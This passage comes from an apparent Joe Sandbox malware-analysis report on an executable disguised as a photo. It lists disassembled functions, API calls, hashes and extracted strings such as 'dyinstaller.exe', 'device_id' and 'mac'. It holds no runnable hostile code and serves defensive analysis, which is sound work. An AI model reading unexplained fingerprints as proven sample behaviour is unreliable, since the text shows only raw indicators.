                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Heap_free_vswprintf_s$AllocateErrorFreeLast_malloc_memset_wcslen_wcsncpy
                                                                • String ID:
                                                                • API String ID: 2711773132-0
                                                                • Opcode ID: 65f9f44ff92cc95177de953fe7eb5d118c37defb216a3cb4c8877b8b117df2cd
                                                                • Instruction ID: 102299e9f2ba1c9fde76a58ac78af59d9ba83793d1b8d1462021c86d2cf70ede
                                                                • Opcode Fuzzy Hash: 65f9f44ff92cc95177de953fe7eb5d118c37defb216a3cb4c8877b8b117df2cd
                                                                • Instruction Fuzzy Hash: F1F062B66002087BD710BB6A9C46FAF779CDF44368F54091AFE15A7182D674E90243B4
                                                                Function 0247E0A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(100179E4,1001C2A0,00000008,0247E1A8,00000000,00000000,?,?,0247D5BC,0247AC7B,?,?,0247A828,?,?,02471020), ref: 0247E0B1
                                                                • __lock.LIBCMT ref: 0247E0E5
                                                                  • Part of subcall function 0247EF96: __mtinitlocknum.LIBCMT ref: 0247EFAC
                                                                  • Part of subcall function 0247EF96: __amsg_exit.LIBCMT ref: 0247EFB8
                                                                  • Part of subcall function 0247EF96: RtlEnterCriticalSection.NTDLL(00000000), ref: 0247EFC0
                                                                • InterlockedIncrement.KERNEL32(?), ref: 0247E0F2
                                                                • __lock.LIBCMT ref: 0247E106
                                                                • ___addlocaleref.LIBCMT ref: 0247E124
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 637971194-0
                                                                • Opcode ID: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                                                • Instruction ID: 30e739a3322a505b1d77dd50aaa62545acf8c6872b35dcf483cec95e385bffda
                                                                • Opcode Fuzzy Hash: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                                                • Instruction Fuzzy Hash: EC013971504700AFE721EF6A8805789BBE1FF10311F20868ED5AA9B7A0CBB4E680CF11
                                                                Function 00420BE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetBkMode.GDI32(?,00000001), ref: 00420BFB
                                                                • SelectObject.GDI32(?,00000000), ref: 00420C14
                                                                • _wcslen.LIBCMT ref: 00420C1F
                                                                • GetTextExtentPoint32W.GDI32(?,?,00000000,?), ref: 00420C2A
                                                                • SelectObject.GDI32(?,00000000), ref: 00420C32
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$ExtentModePoint32Text_wcslen
                                                                • String ID:
                                                                • API String ID: 1260068971-0
                                                                • Opcode ID: ae67c0d33173b0eb8ab10d5572b941c872414157b5bb77bbb363219f47ba841b
                                                                • Instruction ID: 100de4d4ca2ef235a372cb4c47476234133f09f2b089c44b9a198f06cd284c50
                                                                • Opcode Fuzzy Hash: ae67c0d33173b0eb8ab10d5572b941c872414157b5bb77bbb363219f47ba841b
                                                                • Instruction Fuzzy Hash: 10F04F71A00118BFDB01AFA5DC84CFE7BBDFB89304F00C026F90596210E7749D419BA0
                                                                Function 1000E09C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(100179E4,1001C2A0,00000008,1000E1A4,00000000,00000000,?,?,1000D5B8,1000AC77,?,?,1000A824,?,?,1000101C), ref: 1000E0AD
                                                                • __lock.LIBCMT ref: 1000E0E1
                                                                  • Part of subcall function 1000EF92: __mtinitlocknum.LIBCMT ref: 1000EFA8
                                                                  • Part of subcall function 1000EF92: __amsg_exit.LIBCMT ref: 1000EFB4
                                                                  • Part of subcall function 1000EF92: RtlEnterCriticalSection.NTDLL(00000000), ref: 1000EFBC
                                                                • InterlockedIncrement.KERNEL32(?), ref: 1000E0EE
                                                                • __lock.LIBCMT ref: 1000E102
                                                                • ___addlocaleref.LIBCMT ref: 1000E120
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 637971194-0
                                                                • Opcode ID: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                                                • Instruction ID: 9a48f909f7989934b9c459eb75a3addc35068ef0a3d0d7f40ba30f9e57b30fd9
                                                                • Opcode Fuzzy Hash: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                                                • Instruction Fuzzy Hash: BB015B75400B41AFF320DF69D846759BBE0FF10351F10890EE49AAB2A1CBB4FA80CB11
                                                                Function 0247DFA4 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 0247DFB0
                                                                  • Part of subcall function 0247E1CD: __getptd_noexit.LIBCMT ref: 0247E1D0
                                                                  • Part of subcall function 0247E1CD: __amsg_exit.LIBCMT ref: 0247E1DD
                                                                • __getptd.LIBCMT ref: 0247DFC7
                                                                • __amsg_exit.LIBCMT ref: 0247DFD5
                                                                • __lock.LIBCMT ref: 0247DFE5
                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0247DFF9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                • String ID:
                                                                • API String ID: 938513278-0
                                                                • Opcode ID: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
                                                                • Instruction ID: cbdd6c0c315cf6d59dfcd63a080d5559cb6e599e74a091042308cbd837cb0cca
                                                                • Opcode Fuzzy Hash: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
                                                                • Instruction Fuzzy Hash: A8F09032E08610EEE725BB764805BDD37E2AF00724F11428FD436AA2D0CB3485419E56
                                                                Function 0049AC1E Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 0049AC2A
                                                                  • Part of subcall function 00496A53: __getptd_noexit.LIBCMT ref: 00496A56
                                                                  • Part of subcall function 00496A53: __amsg_exit.LIBCMT ref: 00496A63
                                                                • __getptd.LIBCMT ref: 0049AC41
                                                                • __amsg_exit.LIBCMT ref: 0049AC4F
                                                                • __lock.LIBCMT ref: 0049AC5F
                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0049AC73
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                • String ID:
                                                                • API String ID: 938513278-0
                                                                • Opcode ID: 089d4205fa703556bbcad63890de4b2f1961ab9a1e65c361f826eb7fcc8a37e8
                                                                • Instruction ID: c859777d86b819f4f236ab005c923ea34509d736fcc600b0390155981054c658
                                                                • Opcode Fuzzy Hash: 089d4205fa703556bbcad63890de4b2f1961ab9a1e65c361f826eb7fcc8a37e8
                                                                • Instruction Fuzzy Hash: 86F0F6329043008BEF21BB6A580374D3F91AF00728F11912FF4146A2C2CF6D59509ACF
                                                                Function 0045ACC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _rand.LIBCMT ref: 0045AE77
                                                                  • Part of subcall function 00446F50: _wcslen.LIBCMT ref: 00446F98
                                                                  • Part of subcall function 00446F50: _wcslen.LIBCMT ref: 00447035
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_rand
                                                                • String ID: about_protocol$list<T> too long
                                                                • API String ID: 1128127642-1105433192
                                                                • Opcode ID: d7333faf0a45338b6d63091df0d9db53f64c794b1be9481f46f1a8169bc96247
                                                                • Instruction ID: 0a8b59afe58699072eaa17f15003938d365a2d63d1b1c70285f8fec407eae098
                                                                • Opcode Fuzzy Hash: d7333faf0a45338b6d63091df0d9db53f64c794b1be9481f46f1a8169bc96247
                                                                • Instruction Fuzzy Hash: 3B81A2716007019FC728DF28C88195AB7F2FB88315F144A2EE85697741D738ED19CB96
                                                                Function 00451B70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                • _wcslen.LIBCMT ref: 00451DAA
                                                                  • Part of subcall function 00455B40: __CxxThrowException@8.LIBCMT ref: 00455D0C
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455D21
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455DBA
                                                                  • Part of subcall function 00401A8E: std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Exception@8ThrowXinvalid_argumentstd::_
                                                                • String ID: device_id$mac$stats_obj
                                                                • API String ID: 869216139-2010690440
                                                                • Opcode ID: 0d2e0395017e14d6b832ad6a14aa089c494ea07ad8538df73d4766da5d5bed79
                                                                • Instruction ID: 7dead9451998a0c191ff0e79ab12b1d5db03483ee8c8a4b874216f692c491790
                                                                • Opcode Fuzzy Hash: 0d2e0395017e14d6b832ad6a14aa089c494ea07ad8538df73d4766da5d5bed79
                                                                • Instruction Fuzzy Hash: 8A9116B55087408FC714EF19C485A1BFBE1AF98314F508E1EF8A547391DB78E548CB96
                                                                Function 0044A9E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0044AA9F
                                                                • std::exception::exception.LIBCMT ref: 0044ABC0
                                                                • __CxxThrowException@8.LIBCMT ref: 0044ABD5
                                                                  • Part of subcall function 0044ABE0: _wcslen.LIBCMT ref: 0044AC0D
                                                                  • Part of subcall function 00411155: __EH_prolog3_catch.LIBCMT ref: 0041115C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8H_prolog3_catchThrowXinvalid_argument_malloc_wcslenstd::_std::exception::exception
                                                                • String ID: list<T> too long
                                                                • API String ID: 1319022316-4027344264
                                                                • Opcode ID: 034a96965e9defb627811f2550c5259f04fb8b86134075b7484fb6a976de9d2f
                                                                • Instruction ID: 075517dce50a9295124ab426c44f367a45b89aa21e4277eea8ff1afa0bd680ad
                                                                • Opcode Fuzzy Hash: 034a96965e9defb627811f2550c5259f04fb8b86134075b7484fb6a976de9d2f
                                                                • Instruction Fuzzy Hash: 5A61CBB0A006159FEB00DF69C884AAEF7F9FF49304F10492BE215A7300D778B951CB9A
                                                                Function 004469E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • invalid string position, xrefs: 00446B05
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                • String ID: invalid string position
                                                                • API String ID: 1771113911-1799206989
                                                                • Opcode ID: 4c0bc0f859fa48f5f4163d647dfdb19ef55f7dab3f1dbc161fc5c56315b83718
                                                                • Instruction ID: e1002560b1e22483c49d7a601c6e2c8d55dc5fbbb64e28ebaaae96be91998984
                                                                • Opcode Fuzzy Hash: 4c0bc0f859fa48f5f4163d647dfdb19ef55f7dab3f1dbc161fc5c56315b83718
                                                                • Instruction Fuzzy Hash: 7E518471700A118BE720CE69D98052AB3E6FF837007264A3FD492E7645DB74E846879B
                                                                Function 00410636 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0041063D
                                                                  • Part of subcall function 0044BCC0: __fseeki64.LIBCMT ref: 0044BD03
                                                                  • Part of subcall function 0044BCC0: __ftelli64.LIBCMT ref: 0044BD09
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3___fseeki64__ftelli64
                                                                • String ID: .tmp$.tmptmp$dyinstaller.exe
                                                                • API String ID: 3934928578-623731570
                                                                • Opcode ID: 48fcf7a64be9973d4ee02df7f97c44c4c3c66563888c042a62618ff148f44043
                                                                • Instruction ID: 110ca164dd65f36f9eaab849cf677077dacd420befd5a6f1e05f6e09552c2540
                                                                • Opcode Fuzzy Hash: 48fcf7a64be9973d4ee02df7f97c44c4c3c66563888c042a62618ff148f44043
                                                                • Instruction Fuzzy Hash: 5B51A4719003089ADF11EFA5C886ADE7BB5AF44314F10812FE9257B2D1CBB86AC5CF58
                                                                Function 0040A4C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Fputc$H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2569218679-3916222277
                                                                • Opcode ID: cdb67338519721784bfa421f1d88d1fe7d91f1e2b2ec111fb8af0a7474d4717f
                                                                • Instruction ID: e7c1e3757787c2eeaca3a7d0e170a77b568078a037487b785089bd92819e72aa
                                                                • Opcode Fuzzy Hash: cdb67338519721784bfa421f1d88d1fe7d91f1e2b2ec111fb8af0a7474d4717f
                                                                • Instruction Fuzzy Hash: 71419E31900309AFCF21DBA8C9809AEB7B4BB59314F14493BE552B72C0D779A954CB5A
                                                                Function 00405DB6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 121timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00405DC0
                                                                • SetTimer.USER32(?,0000000C,00001388,00000000), ref: 00405E63
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_Timer
                                                                • String ID: MainDlg.cpp$code:%d type:%d
                                                                • API String ID: 2312686240-3394446902
                                                                • Opcode ID: 1c9e5447607d49432b69ea63056d221f8c114516b26d200f927194c9deab740d
                                                                • Instruction ID: a337fa4f9591835c63d2def273bbdfcc4b44a589101a7e3af2360ff7e64327de
                                                                • Opcode Fuzzy Hash: 1c9e5447607d49432b69ea63056d221f8c114516b26d200f927194c9deab740d
                                                                • Instruction Fuzzy Hash: 3841B570D002489EDB00EBA5CC89FDE7BB8AF45304F1440BEE948BB2D2DB785A45CB65
                                                                Function 0040601F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00406029
